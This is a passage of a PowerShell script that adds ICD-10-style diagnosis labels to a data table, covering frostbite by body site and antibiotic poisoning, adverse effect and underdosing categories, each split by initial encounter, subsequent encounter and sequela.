encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left hand","Superficial frostbite of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left hand","Superficial frostbite of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified hand","Superficial frostbite of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified hand","Superficial frostbite of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified hand","Superficial frostbite of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right finger(s)","Superficial frostbite of right finger(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right finger(s)","Superficial frostbite of right finger(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right finger(s)","Superficial frostbite of right finger(s), sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left finger(s)","Superficial frostbite of left finger(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left finger(s)","Superficial frostbite of left finger(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left finger(s)","Superficial frostbite of left finger(s), sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified finger(s)","Superficial frostbite of unspecified finger(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified finger(s)","Superficial frostbite of unspecified finger(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified finger(s)","Superficial frostbite of unspecified finger(s), sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified hip and thigh","Superficial frostbite of unspecified hip and thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified hip and thigh","Superficial frostbite of unspecified hip and thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified hip and thigh","Superficial frostbite of unspecified hip and thigh, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right hip and thigh","Superficial frostbite of right hip and thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right hip and thigh","Superficial frostbite of right hip and thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right hip and thigh","Superficial frostbite of right hip and thigh, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left hip and thigh","Superficial frostbite of left hip and thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left hip and thigh","Superficial frostbite of left hip and thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left hip and thigh","Superficial frostbite of left hip and thigh, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified knee and lower leg","Superficial frostbite of unspecified knee and lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified knee and lower leg","Superficial frostbite of unspecified knee and lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified knee and lower leg","Superficial frostbite of unspecified knee and lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right knee and lower leg","Superficial frostbite of right knee and lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right knee and lower leg","Superficial frostbite of right knee and lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right knee and lower leg","Superficial frostbite of right knee and lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left knee and lower leg","Superficial frostbite of left knee and lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left knee and lower leg","Superficial frostbite of left knee and lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left knee and lower leg","Superficial frostbite of left knee and lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right ankle","Superficial frostbite of right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right ankle","Superficial frostbite of right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right ankle","Superficial frostbite of right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left ankle","Superficial frostbite of left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left ankle","Superficial frostbite of left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left ankle","Superficial frostbite of left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified ankle","Superficial frostbite of unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified ankle","Superficial frostbite of unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified ankle","Superficial frostbite of unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right foot","Superficial frostbite of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right foot","Superficial frostbite of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right foot","Superficial frostbite of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left foot","Superficial frostbite of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left foot","Superficial frostbite of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left foot","Superficial frostbite of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified foot","Superficial frostbite of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified foot","Superficial frostbite of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified foot","Superficial frostbite of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right toe(s)","Superficial frostbite of right toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right toe(s)","Superficial frostbite of right toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of right toe(s)","Superficial frostbite of right toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left toe(s)","Superficial frostbite of left toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left toe(s)","Superficial frostbite of left toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of left toe(s)","Superficial frostbite of left toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified toe(s)","Superficial frostbite of unspecified toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified toe(s)","Superficial frostbite of unspecified toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified toe(s)","Superficial frostbite of unspecified toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified sites","Superficial frostbite of unspecified sites, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified sites","Superficial frostbite of unspecified sites, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of unspecified sites","Superficial frostbite of unspecified sites, sequela") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of other sites","Superficial frostbite of other sites, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of other sites","Superficial frostbite of other sites, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial frostbite of other sites","Superficial frostbite of other sites, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right ear","Frostbite with tissue necrosis of right ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right ear","Frostbite with tissue necrosis of right ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right ear","Frostbite with tissue necrosis of right ear, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left ear","Frostbite with tissue necrosis of left ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left ear","Frostbite with tissue necrosis of left ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left ear","Frostbite with tissue necrosis of left ear, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified ear","Frostbite with tissue necrosis of unspecified ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified ear","Frostbite with tissue necrosis of unspecified ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified ear","Frostbite with tissue necrosis of unspecified ear, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of nose","Frostbite with tissue necrosis of nose, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of nose","Frostbite with tissue necrosis of nose, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of nose","Frostbite with tissue necrosis of nose, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of other part of head","Frostbite with tissue necrosis of other part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of other part of head","Frostbite with tissue necrosis of other part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of other part of head","Frostbite with tissue necrosis of other part of head, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of neck","Frostbite with tissue necrosis of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of neck","Frostbite with tissue necrosis of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of neck","Frostbite with tissue necrosis of neck, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of thorax","Frostbite with tissue necrosis of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of thorax","Frostbite with tissue necrosis of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of thorax","Frostbite with tissue necrosis of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of abdominal wall, lower back and pelvis","Frostbite with tissue necrosis of abdominal wall, lower back and pelvis, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of abdominal wall, lower back and pelvis","Frostbite with tissue necrosis of abdominal wall, lower back and pelvis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of abdominal wall, lower back and pelvis","Frostbite with tissue necrosis of abdominal wall, lower back and pelvis, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified arm","Frostbite with tissue necrosis of unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified arm","Frostbite with tissue necrosis of unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified arm","Frostbite with tissue necrosis of unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right arm","Frostbite with tissue necrosis of right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right arm","Frostbite with tissue necrosis of right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right arm","Frostbite with tissue necrosis of right arm, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left arm","Frostbite with tissue necrosis of left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left arm","Frostbite with tissue necrosis of left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left arm","Frostbite with tissue necrosis of left arm, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right wrist","Frostbite with tissue necrosis of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right wrist","Frostbite with tissue necrosis of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right wrist","Frostbite with tissue necrosis of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left wrist","Frostbite with tissue necrosis of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left wrist","Frostbite with tissue necrosis of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left wrist","Frostbite with tissue necrosis of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified wrist","Frostbite with tissue necrosis of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified wrist","Frostbite with tissue necrosis of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified wrist","Frostbite with tissue necrosis of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right hand","Frostbite with tissue necrosis of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right hand","Frostbite with tissue necrosis of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right hand","Frostbite with tissue necrosis of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left hand","Frostbite with tissue necrosis of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left hand","Frostbite with tissue necrosis of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left hand","Frostbite with tissue necrosis of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified hand","Frostbite with tissue necrosis of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified hand","Frostbite with tissue necrosis of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified hand","Frostbite with tissue necrosis of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right finger(s)","Frostbite with tissue necrosis of right finger(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right finger(s)","Frostbite with tissue necrosis of right finger(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right finger(s)","Frostbite with tissue necrosis of right finger(s), sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left finger(s)","Frostbite with tissue necrosis of left finger(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left finger(s)","Frostbite with tissue necrosis of left finger(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left finger(s)","Frostbite with tissue necrosis of left finger(s), sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified finger(s)","Frostbite with tissue necrosis of unspecified finger(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified finger(s)","Frostbite with tissue necrosis of unspecified finger(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified finger(s)","Frostbite with tissue necrosis of unspecified finger(s), sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified hip and thigh","Frostbite with tissue necrosis of unspecified hip and thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified hip and thigh","Frostbite with tissue necrosis of unspecified hip and thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified hip and thigh","Frostbite with tissue necrosis of unspecified hip and thigh, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right hip and thigh","Frostbite with tissue necrosis of right hip and thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right hip and thigh","Frostbite with tissue necrosis of right hip and thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right hip and thigh","Frostbite with tissue necrosis of right hip and thigh, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left hip and thigh","Frostbite with tissue necrosis of left hip and thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left hip and thigh","Frostbite with tissue necrosis of left hip and thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left hip and thigh","Frostbite with tissue necrosis of left hip and thigh, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified knee and lower leg","Frostbite with tissue necrosis of unspecified knee and lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified knee and lower leg","Frostbite with tissue necrosis of unspecified knee and lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified knee and lower leg","Frostbite with tissue necrosis of unspecified knee and lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right knee and lower leg","Frostbite with tissue necrosis of right knee and lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right knee and lower leg","Frostbite with tissue necrosis of right knee and lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right knee and lower leg","Frostbite with tissue necrosis of right knee and lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left knee and lower leg","Frostbite with tissue necrosis of left knee and lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left knee and lower leg","Frostbite with tissue necrosis of left knee and lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left knee and lower leg","Frostbite with tissue necrosis of left knee and lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right ankle","Frostbite with tissue necrosis of right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right ankle","Frostbite with tissue necrosis of right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right ankle","Frostbite with tissue necrosis of right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left ankle","Frostbite with tissue necrosis of left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left ankle","Frostbite with tissue necrosis of left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left ankle","Frostbite with tissue necrosis of left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified ankle","Frostbite with tissue necrosis of unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified ankle","Frostbite with tissue necrosis of unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified ankle","Frostbite with tissue necrosis of unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right foot","Frostbite with tissue necrosis of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right foot","Frostbite with tissue necrosis of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right foot","Frostbite with tissue necrosis of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left foot","Frostbite with tissue necrosis of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left foot","Frostbite with tissue necrosis of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left foot","Frostbite with tissue necrosis of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified foot","Frostbite with tissue necrosis of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified foot","Frostbite with tissue necrosis of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified foot","Frostbite with tissue necrosis of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right toe(s)","Frostbite with tissue necrosis of right toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right toe(s)","Frostbite with tissue necrosis of right toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of right toe(s)","Frostbite with tissue necrosis of right toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left toe(s)","Frostbite with tissue necrosis of left toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left toe(s)","Frostbite with tissue necrosis of left toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of left toe(s)","Frostbite with tissue necrosis of left toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified toe(s)","Frostbite with tissue necrosis of unspecified toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified toe(s)","Frostbite with tissue necrosis of unspecified toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified toe(s)","Frostbite with tissue necrosis of unspecified toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified sites","Frostbite with tissue necrosis of unspecified sites, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified sites","Frostbite with tissue necrosis of unspecified sites, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of unspecified sites","Frostbite with tissue necrosis of unspecified sites, sequela") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of other sites","Frostbite with tissue necrosis of other sites, initial encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of other sites","Frostbite with tissue necrosis of other sites, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Frostbite with tissue necrosis of other sites","Frostbite with tissue necrosis of other sites, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by penicillins, accidental (unintentional)","Poisoning by penicillins, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by penicillins, accidental (unintentional)","Poisoning by penicillins, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by penicillins, accidental (unintentional)","Poisoning by penicillins, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by penicillins, intentional self-harm","Poisoning by penicillins, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by penicillins, intentional self-harm","Poisoning by penicillins, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by penicillins, intentional self-harm","Poisoning by penicillins, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by penicillins, assault","Poisoning by penicillins, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by penicillins, assault","Poisoning by penicillins, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by penicillins, assault","Poisoning by penicillins, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by penicillins, undetermined","Poisoning by penicillins, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by penicillins, undetermined","Poisoning by penicillins, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by penicillins, undetermined","Poisoning by penicillins, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of penicillins","Adverse effect of penicillins, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of penicillins","Adverse effect of penicillins, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of penicillins","Adverse effect of penicillins, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of penicillins","Underdosing of penicillins, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of penicillins","Underdosing of penicillins, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of penicillins","Underdosing of penicillins, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by cephalosporins and other beta-lactam antibiotics, accidental (unintentional)","Poisoning by cephalosporins and other beta-lactam antibiotics, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cephalosporins and other beta-lactam antibiotics, accidental (unintentional)","Poisoning by cephalosporins and other beta-lactam antibiotics, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cephalosporins and other beta-lactam antibiotics, accidental (unintentional)","Poisoning by cephalosporins and other beta-lactam antibiotics, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by cephalosporins and other beta-lactam antibiotics, intentional self-harm","Poisoning by cephalosporins and other beta-lactam antibiotics, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cephalosporins and other beta-lactam antibiotics, intentional self-harm","Poisoning by cephalosporins and other beta-lactam antibiotics, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cephalosporins and other beta-lactam antibiotics, intentional self-harm","Poisoning by cephalosporins and other beta-lactam antibiotics, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by cephalosporins and other beta-lactam antibiotics, assault","Poisoning by cephalosporins and other beta-lactam antibiotics, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cephalosporins and other beta-lactam antibiotics, assault","Poisoning by cephalosporins and other beta-lactam antibiotics, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cephalosporins and other beta-lactam antibiotics, assault","Poisoning by cephalosporins and other beta-lactam antibiotics, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by cephalosporins and other beta-lactam antibiotics, undetermined","Poisoning by cephalosporins and other beta-lactam antibiotics, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cephalosporins and other beta-lactam antibiotics, undetermined","Poisoning by cephalosporins and other beta-lactam antibiotics, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by cephalosporins and other beta-lactam antibiotics, undetermined","Poisoning by cephalosporins and other beta-lactam antibiotics, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of cephalosporins and other beta-lactam antibiotics","Adverse effect of cephalosporins and other beta-lactam antibiotics, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of cephalosporins and other beta-lactam antibiotics","Adverse effect of cephalosporins and other beta-lactam antibiotics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of cephalosporins and other beta-lactam antibiotics","Adverse effect of cephalosporins and other beta-lactam antibiotics, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of cephalosporins and other beta-lactam antibiotics","Underdosing of cephalosporins and other beta-lactam antibiotics, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of cephalosporins and other beta-lactam antibiotics","Underdosing of cephalosporins and other beta-lactam antibiotics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of cephalosporins and other beta-lactam antibiotics","Underdosing of cephalosporins and other beta-lactam antibiotics, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by chloramphenicol group, accidental (unintentional)","Poisoning by chloramphenicol group, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by chloramphenicol group, accidental (unintentional)","Poisoning by chloramphenicol group, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by chloramphenicol group, accidental (unintentional)","Poisoning by chloramphenicol group, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by chloramphenicol group, intentional self-harm","Poisoning by chloramphenicol group, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by chloramphenicol group, intentional self-harm","Poisoning by chloramphenicol group, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by chloramphenicol group, intentional self-harm","Poisoning by chloramphenicol group, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by chloramphenicol group, assault","Poisoning by chloramphenicol group, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by chloramphenicol group, assault","Poisoning by chloramphenicol group, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by chloramphenicol group, assault","Poisoning by chloramphenicol group, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by chloramphenicol group, undetermined","Poisoning by chloramphenicol group, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by chloramphenicol group, undetermined","Poisoning by chloramphenicol group, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by chloramphenicol group, undetermined","Poisoning by chloramphenicol group, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of chloramphenicol group","Adverse effect of chloramphenicol group, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of chloramphenicol group","Adverse effect of chloramphenicol group, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of chloramphenicol group","Adverse effect of chloramphenicol group, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of chloramphenicol group","Underdosing of chloramphenicol group, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of chloramphenicol group","Underdosing of chloramphenicol group, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of chloramphenicol group","Underdosing of chloramphenicol group, sequela") + $null = 